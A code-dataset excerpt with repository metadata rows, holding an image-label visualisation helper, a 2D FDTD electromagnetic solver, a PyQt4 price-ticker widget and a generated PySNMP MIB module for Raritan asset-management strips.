img_gray = skimage.color.rgb2gray(img)
img_gray = skimage.color.gray2rgb(img_gray)
img_gray *= 255
lbl_viz = alpha * lbl_viz + (1 - alpha) * img_gray
lbl_viz = lbl_viz.astype(np.uint8)
if label_names is None:
return lbl_viz
# cv2 is required only if label_names is not None
import cv2
if cv2 is None:
warnings.warn('label2rgb with label_names requires OpenCV (cv2), '
'so ignoring label_names values.')
return lbl_viz
np.random.seed(1234)
for label in np.unique(lbl):
if label == -1:
continue # unlabeled
mask = lbl.squeeze() == label
if 1. * mask.sum() / mask.size < thresh_suppress:
continue
mask = (mask * 255).astype(np.uint8)
import scipy.ndimage
y, x = scipy.ndimage.center_of_mass(mask)
y, x = map(int, [y, x])
if lbl.squeeze()[y, x] != label:
Y, X = np.where(mask)
point_index = np.random.randint(0, len(Y))
y, x = Y[point_index], X[point_index]
text = label_names[label]
font_face = cv2.FONT_HERSHEY_SIMPLEX
font_scale = 0.7
thickness = 2
text_size, baseline = cv2.getTextSize(
text, font_face, font_scale, thickness)
def get_text_color(color):
if color[0] * 0.299 + color[1] * 0.587 + color[2] * 0.114 > 170:
return (0, 0, 0)
return (255, 255, 255)
color = get_text_color(lbl_viz[0, 0, y, x])
cv2.putText(lbl_viz[0, 0, :, :], text,
(x - text_size[0] // 2, y),
font_face, font_scale, color, thickness)
return lbl_viz
def transform(img):
mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])
img = img[:, :, ::-1] # RGB -> BGR
img = img.astype(np.float64)
img -= mean_bgr
img = img.transpose(2, 0, 1)
img = torch.from_numpy(img).float()
return img
| 33.367347
| 80
| 0.626504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,698
| 0.346177
|
8bdf61ec1b8d8328f9ce10467e5dc4c43240c500
| 6,421
|
py
|
Python
|
fdtd/2d/src/fdtd/solver.py
|
Elena-Torres-Lozano/MCFNL2021
|
b60ecda2dc35fe08ce6cf131c45acc0349dce29c
|
[
"BSD-3-Clause"
] | null | null | null |
fdtd/2d/src/fdtd/solver.py
|
Elena-Torres-Lozano/MCFNL2021
|
b60ecda2dc35fe08ce6cf131c45acc0349dce29c
|
[
"BSD-3-Clause"
] | null | null | null |
fdtd/2d/src/fdtd/solver.py
|
Elena-Torres-Lozano/MCFNL2021
|
b60ecda2dc35fe08ce6cf131c45acc0349dce29c
|
[
"BSD-3-Clause"
] | null | null | null |
import math
import numpy as np
import scipy.constants as sp
import copy
import time
X = 0 # Cartesian indices
Y = 1
L = 0 # Lower
U = 1 # Upper
def gaussian(x, delay, spread):
return np.exp( - ((x-delay)**2 / (2*spread**2)) )
def subsId(id):
if id is None:
return -1
else:
return id-1
class Solver:
class Fields:
def __init__(self, ex, ey, hz):
self.ex = ex
self.ey = ey
self.hz = hz
def get(self):
return (self.ex, self.ey, self.hz)
__timeStepPrint = 5000
def __init__(self, mesh, options, probes, sources):
self.options = options
self._mesh = copy.deepcopy(mesh)
self._probes = copy.deepcopy(probes)
for p in self._probes:
box = self._mesh.elemIdToBox(p["elemId"])
box = self._mesh.snap(box)
ids = self._mesh.toIdx(box)
Nxy = abs(ids[Y] - ids[X])
p["mesh"] = {"origin": box[L], "steps": abs(box[U]-box[L]) / Nxy}
p["indices"] = ids
p["time"] = [0.0]
p["values"] = [np.zeros((Nxy[X], Nxy[Y]))]
# for initial in self._initialCond:
# if initial["type"] == "gaussian":
# position=self._mesh.pos
# values=Solver.movingGaussian(position, 0, \
# sp.speed_of_light,initial["peakPosition"],\
# initial["gaussianAmplitude"], \
# initial["gaussianSpread"] )
# p["values"]= [values[ids[0]:ids[1]]]
# else:
# raise ValueError(\
# "Invalid initial condition type: " + initial["type"] )
self._sources = copy.deepcopy(sources)
for source in self._sources:
box = self._mesh.elemIdToBox(source["elemId"])
ids = mesh.toIdx(box)
source["index"] = ids
self.old = self.Fields(
ex = np.zeros( (mesh.pos[X].size-1, mesh.pos[Y].size ) ),
ey = np.zeros( (mesh.pos[X].size, mesh.pos[Y].size-1) ),
hz = np.zeros( (mesh.pos[X].size-1, mesh.pos[Y].size-1) ) )
def _dt(self):
return self.options["cfl"] * min(self._mesh.steps()) / math.sqrt(2.0)
def timeStep(self):
return self._dt() / sp.speed_of_light
def getProbes(self):
res = self._probes
return res
# ======================= UPDATE E =============================
def _updateE(self, t, dt, overFields = None):
eNew = (np.zeros( self.old.ex.shape ),
np.zeros( self.old.ey.shape ) )
(ex, ey, h) = self.old.get()
e = (ex, ey)
(dX, dY) = self._mesh.steps()
A = dX * dY
eNew[X][:,1:-1] = e[X][:,1:-1] + dt/A*dX * (h[:,1:] - h[:,:-1])
eNew[Y][1:-1,:] = e[Y][1:-1,:] - dt/A*dY * (h[1:,:] - h[:-1,:])
# Boundary conditions
for bound in self._mesh.bounds:
xy = bound.orientation()
(lx, ux) = (bound.arrayIdx(L,X), \
bound.arrayIdx(U,X))
(ly, uy) = (bound.arrayIdx(L,Y), \
bound.arrayIdx(U,Y))
if isinstance(bound, self._mesh.BoundPEC):
eNew[xy][lx:ux,ly:uy] = 0.0
else:
raise ValueError("Unrecognized boundary type")
# Subgridding and updating
e[X][:] = eNew[X][:]
e[Y][:] = eNew[Y][:]
# ======================= UPDATE H =============================
def _updateH(self, t, dt):
hNew = np.zeros( self.old.hz.shape )
(ex, ey, h) = self.old.get()
(dX, dY) = self._mesh.steps()
A = dX * dY
hNew[:,:] = h[:,:] \
- dt/A * dY * ey[1:, :] \
+ dt/A * dX * ex[ :, 1:] \
+ dt/A * dY * ey[:-1, :] \
- dt/A * dX * ex[ :, :-1]
# Source terms
for source in self._sources:
if source["type"] == "dipole":
magnitude = source["magnitude"]
if magnitude["type"] == "gaussian":
c0 = sp.speed_of_light
delay = c0 * magnitude["gaussianDelay"]
spread = c0 * magnitude["gaussianSpread"]
id = source["index"]
hNew[id[L][X]:id[U][X], id[L][Y]:id[U][Y]] += \
gaussian(t, delay, spread)*dt
else:
raise ValueError(\
"Invalid source magnitude type: " + magnitude["type"])
else:
raise ValueError("Invalid source type: " + source["type"])
h[:] = hNew[:]
def _updateProbes(self, t):
for p in self._probes:
dimensionalTime = t/sp.speed_of_light
writeStep = "samplingPeriod" in p \
and (dimensionalTime/p["samplingPeriod"] >= len(p["time"]))
writeStep = writeStep or "samplingPeriod" not in p
if writeStep:
p["time"].append(dimensionalTime)
idx = p["indices"]
values = np.zeros(tuple(idx[U]-idx[L]))
values[:,:] = \
self.old.hz[ idx[L][X]:idx[U][X], idx[L][Y]:idx[U][Y] ]
p["values"].append(values)
def solve(self, dimensionalFinalTime):
tic = time.time()
t = 0.0
dt = self._dt()
numberOfTimeSteps = \
int(dimensionalFinalTime * sp.speed_of_light / dt)
for n in range(numberOfTimeSteps):
self._updateE(t, dt, self.old)
t += dt/2.0
self._updateH(t, dt)
t += dt/2.0
self._updateProbes(t)
if n % self.__timeStepPrint == 0 or n+1 == numberOfTimeSteps:
remaining = (time.time() - tic) * \
(numberOfTimeSteps-n) / (n+1)
min = math.floor(remaining / 60.0)
sec = remaining % 60.0
print(" Step: %6d of %6d. Remaining: %2.0f:%02.0f"% (n, \
numberOfTimeSteps-1, min, sec))
print(" CPU Time: %f [s]" % (time.time() - tic))
@staticmethod
def movingGaussian(x,y,t,c,center,A,spread):
return A*np.exp(-(((x-center)-c*t)**2 /(2*spread**2)))
| 33.973545
| 79
| 0.454914
| 6,103
| 0.950475
| 0
| 0
| 125
| 0.019467
| 0
| 0
| 1,069
| 0.166485
|
8bdfa2aafd82d2863e79980ee316f8cecf63acbc
| 2,505
|
py
|
Python
|
myticker.py
|
bitsanity/rateboard
|
f362505d6b9672d2f22bc6e6650975899d2ea127
|
[
"Apache-2.0"
] | 3
|
2017-08-24T14:36:49.000Z
|
2018-11-21T21:14:06.000Z
|
myticker.py
|
bitsanity/rateboard
|
f362505d6b9672d2f22bc6e6650975899d2ea127
|
[
"Apache-2.0"
] | null | null | null |
myticker.py
|
bitsanity/rateboard
|
f362505d6b9672d2f22bc6e6650975899d2ea127
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys, traceback
import threading
import time
from PyQt4 import QtGui,QtCore
from boardlet import Boardlet
from modellet import Modellet
class MyTicker(Boardlet):
def __init__(self, parent, getbidobj, getaskobj):
super(MyTicker, self).__init__(parent)
self.p_model = MyModel(getbidobj, getaskobj)
self.initUI()
def initUI(self):
super(MyTicker, self).initUI()
self.p_icon = QtGui.QLabel(self)
self.p_icon.setGeometry( self.b_imgx(), self.b_imgy(),
self.b_iconwidth(),self.b_iconheight() )
self.p_icon.setPixmap( QtGui.QPixmap(os.getcwd() + "/img/my.png" ) )
t = threading.Thread(target=self.periodicUpdate)
t.setDaemon(True)
t.start()
def paintEvent(self, e):
super(MyTicker, self).paintEvent(e)
qp = QtGui.QPainter()
qp.begin(self)
qp.setPen( self.p_grayPen )
qp.setFont( self.p_pairFont )
qp.drawText( self.b_col1x(), self.b_row1y(), 'My Prices (USD)' )
qp.setPen( self.p_whitePen )
qp.setFont( self.p_normFont )
qp.drawText( self.b_col1x(), self.b_row2y() - 5,
'buy: ' + self.p_model.getBuy() )
qp.drawText( self.b_col1x(), self.b_row3y() - 5,
'sell: ' + self.p_model.getSell() )
qp.setFont( self.p_timeFont )
qp.setPen( self.p_grayPen )
qp.drawText( self.b_imgx(), self.b_row4y(),
'Refreshed: ' + self.p_model.getLastUpdated() )
qp.end()
def periodicUpdate(self):
while(True):
st = self.getNextWaitTimeSeconds()
time.sleep( st )
self.p_model.doRefresh()
class MyModel(Modellet):
def __init__(self, getbidobj, getaskobj):
self.p_refreshTime = None
self.p_buy = '000.00'
self.p_sell = '000.00'
self.p_bidobj = getbidobj
self.p_askobj = getaskobj
def getBuy(self):
return self.p_buy
def getSell(self):
return self.p_sell
def doRefresh(self):
try:
# calc and apply 1.5% spread to retrieve fee
self.p_buy = "%.2f" % (float(self.p_bidobj.getBid()) * 0.985)
self.p_sell = "%.2f" % (float(self.p_askobj.getAsk()) * 1.015)
super(MyModel, self).setFaultFlag(False)
super(MyModel, self).setLastUpdatedNow()
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
print ''.join('!! ' + line for line in lines)
super(MyModel, self).setFaultFlag(True)
| 28.793103
| 76
| 0.64511
| 2,303
| 0.919361
| 0
| 0
| 0
| 0
| 0
| 0
| 177
| 0.070659
|
8bdfada5a195abb5fa1a5addc5ae23054f34a07f
| 62,005
|
py
|
Python
|
pysnmp-with-texts/ASSETMANAGEMENT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/ASSETMANAGEMENT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/ASSETMANAGEMENT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module ASSETMANAGEMENT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASSETMANAGEMENT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:29:30 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
InetPortNumber, InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetPortNumber", "InetAddress", "InetAddressType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
sysName, sysLocation, sysContact = mibBuilder.importSymbols("SNMPv2-MIB", "sysName", "sysLocation", "sysContact")
NotificationType, Gauge32, ModuleIdentity, MibIdentifier, Integer32, Counter64, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Counter32, Unsigned32, enterprises, ObjectIdentity, TimeTicks, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Gauge32", "ModuleIdentity", "MibIdentifier", "Integer32", "Counter64", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Counter32", "Unsigned32", "enterprises", "ObjectIdentity", "TimeTicks", "Bits")
DisplayString, TruthValue, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TextualConvention")
raritan = ModuleIdentity((1, 3, 6, 1, 4, 1, 13742))
raritan.setRevisions(('2015-01-05 00:00', '2014-09-25 00:00', '2014-04-04 00:00', '2012-03-29 00:00', '2012-03-26 00:00', '2012-02-14 00:00', '2012-02-10 00:00', '2012-02-08 00:00', '2012-02-07 00:00', '2012-02-03 00:00', '2012-01-17 00:00', '2012-01-04 00:00', '2011-12-08 00:00', '2011-11-11 00:00', '2011-11-09 00:00', '2011-10-25 00:00', '2011-10-05 00:00', '2011-09-05 00:00', '2011-09-01 00:00', '2011-08-23 00:00', '2011-05-18 00:00', '2011-05-04 00:00', '2011-04-15 00:00', '2011-02-18 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: raritan.setRevisionsDescriptions(('The following changes were made. 1) Added agentInetPortNumber under trapInformation 2) Added agentInetPortNumber as a varbind to all traps ', 'The following changes were made. 1) added assetStripCascadePosition to the assetManagement table 2) added rackUnitRelativePosition to the assetManagement table. 3) added assetStripNumberOfRackUnits to the assetManagement table. 4) added assetStripType, assetStripCascadePosition, rackUnitRelativePosition, assetStripNumberOfRackUnits to the following traps. assetTagConnected assetTagDisconnected bladeExtensionConnected bladeExtensionDisconnected ', 'The following changes were made. 1) added bladeTagID to assetTagConnected and assetTagDisconnected traps 2) added rackUnitCount to the following traps. assetTagConnected assetTagDisconnected bladeExtensionConnected bladeExtensionDisconnected assetStripStateChange ', 'The following changes were made. 1) add logParentBladeID to AssetManagementLogEntryStruct ', 'The following changes were made. 1) clarify documentation of LED operation mode: setting ledMode, ledColor or ledColorStr automatically switches the ledOperationMode to manual. ', 'The following changes were made. 1) add logAssetStripState and extend logEventType with assetStripStateChange ', 'The following changes were made. 1) clarify documentation regarding logSlotNumber: it is 0 a) indicating a tag on the main strip b) in case no strip is connected or the value is not valid for a certain log entry ', 'The following changes were made. 1) added bladeExtensionSize to bladeExtensionConnected and bladeExtensionDisconnected traps ', 'The following changes were made. 1) added logSize, oldestLogID, newestLogID and logEventCount 2) added assetManagementLogTable and assetManagementLogEntry ', ' 1) Added assetStripDefaultLEDColorConnected, assetStripDefaultLEDColorConnectedStr, assetStripDefaultLEDColorDisconnected, assetStripDefaultLEDColorDisconnectedStr to AssetStripConfigurationEntryStruct 2) Deprecated defaultLEDColorConnected, defaultLEDColorConnectedStr, defaultLEDColorDisconnected, defaultLEDColorDisconnectedStr ', '1) add rackUnitPosition to the following traps: assetTagConnected, assetTagDisconnected, bladeExtensionConnected, bladeExtensionDisconnected, rackUnitConfigurationChanged 2) rackUnitNumber in the traps now always corresponds with rackUnitID, clarify documentation accordingly ', ' 1) extended AssetStripConfigurationEntryStruct by assetStripType and numberOfComponentAssetStrips 2) added compositeAssetStripCompositionChanged trap ', ' 1) removed bladeSlotNumberingMode from AssetManagementEntryStruct 2) removed BladeSlotNumberingModeEnumeration 3) removed bladeSlotNumberingMode from the rackUnitConfigurationChanged trap ', 'The following changes were made. 1) allow 0 in rackUnitPosition in case there is no strip connected 2) added none (nothing connected) and unknown (strip disconnected) to rackUnitType ', 'The following changes were made. 1) allow a 0 in bladeExtensionSize in case there is no blade extension connected or the asset strip is disconnected. ', 'The following changes were made. 1) added sysContact,sysName, sysLocation to all traps 2) added currentMainTagCount, currentBladeTagCount 3) added maxMainTagCount, maxBladeTagCount 4) added bladeExtensionOverflow 5) added traps bladeExtensionOverflowOccured, bladeExtensionOverflowCleared ', 'The following changes were made. 1) Added assetStripName to all traps ', '1) added rackUnitName ', ' 1) added bladeExtensionConnected, bladeExtensionDisconnected traps 2) in AssetManagementEntryStruct renamed rackUnitSize to bladeExtensionSize 3) added bladeSlotPosition to BladeExtensionEntryStruct 4) added bladeSlotNumberingMode to AssetManagementEntryStruct 5) added BladeSlotNumberingModeEnumeration 6) added bladeSlotNumberingMode to the rackUnitConfigurationChanged trap ', 'Support blade server extension segments: 1) added rackUnitType, rackUnitSize 2) added bladeExtensionTable and bladeExtensionEntry 3) added slotNumber to assetTagConnected and assetTagDisconnected traps ', 'The following changes were made. 1) Modified blinking speeds in AssetManagementLEDModeEnumeration to fastBlink, slowBlink ', 'The following changes were made. 1) Added ledOperationMode to the Tag Connected and Tag Disconnected Traps. 2) Modified the DESCRIPTION of rackUnitNumberingOffset. 3) Modified blinking speeds in AssetManagementLEDModeEnumeration to blinkFastest, blink2ndFastest ', 'The following changes were made. 1) Added DeviceConfigurationParameterEnumeration, RackUnitNumberingModeEnumeration, AssetStripOrientationEnumeration 2) Added deviceConfigurationChanged Trap 3) Added deviceUserName, deviceChangedParameter, changedParameterNewValue to trapInformationGroup 4) Added blinking2(4) to AssetManagementLEDModeEnumeration 5) Add led mode and led color information to the Tag Connected and Tag Disconnected Traps. 6) Added rackUnitNumberingMode, rackUnitNumberingOffset, assetStripOrientation to AssetStripConfigurationEntryStruct 7) Added rackUnitPosition to AssetManagementEntryStruct 8) Added rackUnitConfigurationChanged Trap ', 'The first version of the MIB.',))
if mibBuilder.loadTexts: raritan.setLastUpdated('201501050000Z')
if mibBuilder.loadTexts: raritan.setOrganization('Raritan')
if mibBuilder.loadTexts: raritan.setContactInfo(' Author: Raritan Americas, Inc. postal: Raritan Americas, Inc. 400 Cottontail Lane Somerset, NJ 08873 email: tech@raritan.com phone: +1 732 764 8886 ')
if mibBuilder.loadTexts: raritan.setDescription('This MIB describes the SNMP functions of the asset management capable products from Raritan Computer.')
assetManager = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7))
traps = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 0))
trapInformation = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0))
configuration = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 1))
conformance = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 2))
log = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 3))
assetStrip = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6))
assetManagement = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7))
compliances = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 2, 1))
groups = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2))
complianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 13742, 7, 2, 1, 1)).setObjects(("ASSETMANAGEMENT-MIB", "configGroup"), ("ASSETMANAGEMENT-MIB", "assetManagementGroup"), ("ASSETMANAGEMENT-MIB", "trapInformationGroup"), ("ASSETMANAGEMENT-MIB", "trapsGroup"), ("ASSETMANAGEMENT-MIB", "logGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
complianceRev1 = complianceRev1.setStatus('deprecated')
if mibBuilder.loadTexts: complianceRev1.setDescription('The requirements for conformance to the ASSETMANAGEMENT-MIB. This is deprecated in favor of complianceRev2')
complianceRev2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 13742, 7, 2, 1, 2)).setObjects(("ASSETMANAGEMENT-MIB", "configGroup2"), ("ASSETMANAGEMENT-MIB", "assetManagementGroup"), ("ASSETMANAGEMENT-MIB", "trapInformationGroup"), ("ASSETMANAGEMENT-MIB", "trapsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
complianceRev2 = complianceRev2.setStatus('current')
if mibBuilder.loadTexts: complianceRev2.setDescription('The requirements for conformance to the ASSETMANAGEMENT-MIB.')
configGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 1)).setObjects(("ASSETMANAGEMENT-MIB", "defaultLEDColorConnected"), ("ASSETMANAGEMENT-MIB", "defaultLEDColorConnectedStr"), ("ASSETMANAGEMENT-MIB", "defaultLEDColorDisconnected"), ("ASSETMANAGEMENT-MIB", "defaultLEDColorDisconnectedStr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
configGroup = configGroup.setStatus('deprecated')
if mibBuilder.loadTexts: configGroup.setDescription('A collection of objects representing configuration data. ')
configGroup2 = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 5)).setObjects(("ASSETMANAGEMENT-MIB", "assetStripCount"), ("ASSETMANAGEMENT-MIB", "assetStripState"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "rackUnitNumberingMode"), ("ASSETMANAGEMENT-MIB", "rackUnitNumberingOffset"), ("ASSETMANAGEMENT-MIB", "assetStripOrientation"), ("ASSETMANAGEMENT-MIB", "currentMainTagCount"), ("ASSETMANAGEMENT-MIB", "currentBladeTagCount"), ("ASSETMANAGEMENT-MIB", "maxMainTagCount"), ("ASSETMANAGEMENT-MIB", "maxBladeTagCount"), ("ASSETMANAGEMENT-MIB", "bladeExtensionOverflow"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "numberOfComponentAssetStrips"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorConnected"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorConnectedStr"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorDisconnected"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorDisconnectedStr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
configGroup2 = configGroup2.setStatus('current')
if mibBuilder.loadTexts: configGroup2.setDescription('A collection of objects representing configuration data.')
assetManagementGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 2)).setObjects(("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledColorStr"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeTagID"), ("ASSETMANAGEMENT-MIB", "tagFamily"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitType"), ("ASSETMANAGEMENT-MIB", "bladeExtensionSize"), ("ASSETMANAGEMENT-MIB", "bladeSlotPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
assetManagementGroup = assetManagementGroup.setStatus('current')
if mibBuilder.loadTexts: assetManagementGroup.setDescription('A collection of objects providing the ability to control the asset management strip.')
trapsGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 3)).setObjects(("ASSETMANAGEMENT-MIB", "assetStripStateChange"), ("ASSETMANAGEMENT-MIB", "assetTagConnected"), ("ASSETMANAGEMENT-MIB", "assetTagDisconnected"), ("ASSETMANAGEMENT-MIB", "assetStripFirmwareUpdate"), ("ASSETMANAGEMENT-MIB", "deviceConfigurationChanged"), ("ASSETMANAGEMENT-MIB", "rackUnitConfigurationChanged"), ("ASSETMANAGEMENT-MIB", "bladeExtensionConnected"), ("ASSETMANAGEMENT-MIB", "bladeExtensionDisconnected"), ("ASSETMANAGEMENT-MIB", "bladeExtensionOverflowOccured"), ("ASSETMANAGEMENT-MIB", "bladeExtensionOverflowCleared"), ("ASSETMANAGEMENT-MIB", "compositeAssetStripCompositionChanged"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
trapsGroup = trapsGroup.setStatus('current')
if mibBuilder.loadTexts: trapsGroup.setDescription('A collection of traps.')
trapInformationGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 4)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "slotNumber"), ("ASSETMANAGEMENT-MIB", "assetStripFirmwareUpdateState"), ("ASSETMANAGEMENT-MIB", "deviceUserName"), ("ASSETMANAGEMENT-MIB", "deviceChangedParameter"), ("ASSETMANAGEMENT-MIB", "changedParameterNewValue"), ("ASSETMANAGEMENT-MIB", "oldNumberOfComponentAssetStrips"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
trapInformationGroup = trapInformationGroup.setStatus('current')
if mibBuilder.loadTexts: trapInformationGroup.setDescription('A collection of objects providing information in the traps.')
logGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 6)).setObjects(("ASSETMANAGEMENT-MIB", "logSize"), ("ASSETMANAGEMENT-MIB", "oldestLogID"), ("ASSETMANAGEMENT-MIB", "newestLogID"), ("ASSETMANAGEMENT-MIB", "logEventCount"), ("ASSETMANAGEMENT-MIB", "logTimeStamp"), ("ASSETMANAGEMENT-MIB", "logEventType"), ("ASSETMANAGEMENT-MIB", "logAssetStripNumber"), ("ASSETMANAGEMENT-MIB", "logRackUnitNumber"), ("ASSETMANAGEMENT-MIB", "logRackUnitPosition"), ("ASSETMANAGEMENT-MIB", "logSlotNumber"), ("ASSETMANAGEMENT-MIB", "logTagID"), ("ASSETMANAGEMENT-MIB", "logAssetStripState"), ("ASSETMANAGEMENT-MIB", "logParentBladeID"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
logGroup = logGroup.setStatus('current')
if mibBuilder.loadTexts: logGroup.setDescription('A collection of objects representing log data.')
class AssetManagementLEDModeEnumeration(TextualConvention, Integer32):
description = 'The mode of an LED for the asset manager.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))
namedValues = NamedValues(("on", 1), ("off", 2), ("fastBlink", 3), ("slowBlink", 4))
class AssetManagementLEDOperationModeEnumeration(TextualConvention, Integer32):
description = 'The operation mode of an LED for the asset manager.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("manual", 1), ("automatic", 2))
class AssetStripStateEnumeration(TextualConvention, Integer32):
description = 'The state of an asset strip.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))
namedValues = NamedValues(("disconnected", 1), ("firmwareUpdate", 2), ("unsupported", 3), ("available", 4))
class AssetStripFirmwareUpdateStateEnumeration(TextualConvention, Integer32):
description = 'The state of an asset strip firmware update.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("started", 1), ("successful", 2), ("failed", 3))
class RackUnitTypeEnumeration(TextualConvention, Integer32):
description = 'Type of an asset tag.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 30, 31))
namedValues = NamedValues(("single", 1), ("blade", 2), ("none", 30), ("unknown", 31))
class RGBCOLOR(TextualConvention, OctetString):
description = 'An RGB color value.'
status = 'current'
displayHint = '1d;'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 3)
fixedLength = 3
class RackUnitNumberingModeEnumeration(TextualConvention, Integer32):
description = 'The configurable parameters.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("topDown", 0), ("bottomUp", 1))
class AssetStripOrientationEnumeration(TextualConvention, Integer32):
description = 'The configurable parameters.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("topConnector", 0), ("bottomConnector", 1))
class DeviceConfigurationParameterEnumeration(TextualConvention, Integer32):
description = 'The configurable parameters.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6))
